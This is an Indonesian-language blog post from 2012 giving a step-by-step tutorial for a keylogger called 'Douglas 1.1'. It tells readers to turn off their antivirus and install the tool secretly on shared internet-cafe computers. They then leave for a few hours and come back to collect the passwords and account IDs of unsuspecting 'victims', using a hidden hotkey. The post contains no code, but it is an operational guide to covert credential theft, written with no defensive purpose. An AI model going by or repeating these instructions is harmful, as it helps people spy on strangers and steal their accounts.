Monday, March 19, 2012

Keylog Douglas 1.1

 gan ane share lagi keyloger koleksi ane..
namanya keyloger DOUGLAS 1.1  ini keyloger fungsinya
gak beda jauh ama jenis keyloger yg laen-nya
bedanya.. kalo yg ini kga bisa kirim data n SS ke E-mail kita

DOUGLAS 1.1 termasuk keyloger yg gampang di gunakan lo gan
cocok banget buat agan-agan yg masih NEWBIE

okeh langsung aja ane kasih tutorial cara makenya
prtama-tama agan kudu download keylogernya dulu KLIK DISINI

*jangan lupa untuk disable semua anti virus yg ada di kompi agan,
supaya kga broken nantinya waktu lagi unduh dan instal itu keyloger

Kalo agan dah download keylogernya
ikuti langkah-langkah di bawah ini..... sepoong !!

1. 
buka/extract keylogernya
(kalo bisa foldernya agan di sumpetin supaya kaga di utak-atik ama orang)

 2. setelah agan extract file rar/zip nya, agan bakalan nemu dua folder
nama foldernya:

-DOUGLAS_EN= berbahasa inggris
-DOUGLAS_ES= espanyol
pilih salah satu, atu agan pilih folder yg DUGLAS_EN
nah kalo yg folder DOUGLAS_ES di apus aja


3. nah di dalem folder DOUGLAS_EN agan pilih install.exe
liat gambar di bawah ini


4. ketika agan sedang meng-instal, agan di kasih pilihan untuk mempassword/tidak
pilih trserah agan, kalo agan kasi pasword keylogernya, nanti cuma agan yg bisa
buka itu keyloger.. (karena agan yg tau passwordnya).

 

DOUGLAS yang agan instal, nantinya bakalan masuk ke Sistem 32
dengan nama folder DGL



5. sebenarnya setelah agan meng-install DUOGLASini keyloger langsung beraksi
(langsung merekam aktifitas qeyboard)
kalo agan kga percaya, coba update setatus Facebook sebentar...
lalu agan buka folder yg tadi.. yaitu folder DOUGLAS_EN
dan agan klik Readinfo.exe


kalo agan mempasword DOUGLASNYA
masukan password yg tadi agan kasi ketika penginstallan

 kalo gak mem-pasword, agan bisa langsung buka
Readinfo.exe nya


6. setiap keyloger pasti ada Hot keys-nya untuk DOUGLAS
 Hot keysnya adalah Shift+ctrl+alt+F9 tekan semua tombol bersamaan
maka akan keluar tool kayak gambar di bawah ini
kalo agan ribet ama hot keys-nyabisa agan ganti kok sesuka hati


Udah ngerti belon gan????
kalo agan dah ngerti, suyukur deh.. coz ane dah pegel nih ngetik tutornya.. wkwkw
jadi intinya kalo agan dah instal DOUGLASnya.. maka ini keyloger dah langsung Beraksi
jadi. baiknya, kalo agan instal DOUGLAS di Warnet.. agan Off aja kompinya n agan pulang dulu.


kalo dah 2/3jam agan balik lagi ke kompi yg dah agan
pasang DUOGLAS, agan tingal teken tombol Shift+ctrl+alt+F9,
lalu pilih Readin formation


Tara.....!!!! agan ane jamin kebanjiran pasword n id si korban

Good Luck !!

0 comments:

Post a Comment

 
Copyright © 2011. Ter UPDATE . All Rights Reserved
Home | Company Info | Contact Us | Privacy policy | Term of use | Widget | Site map
Design by Herdiansyah . Published by Borneo Templates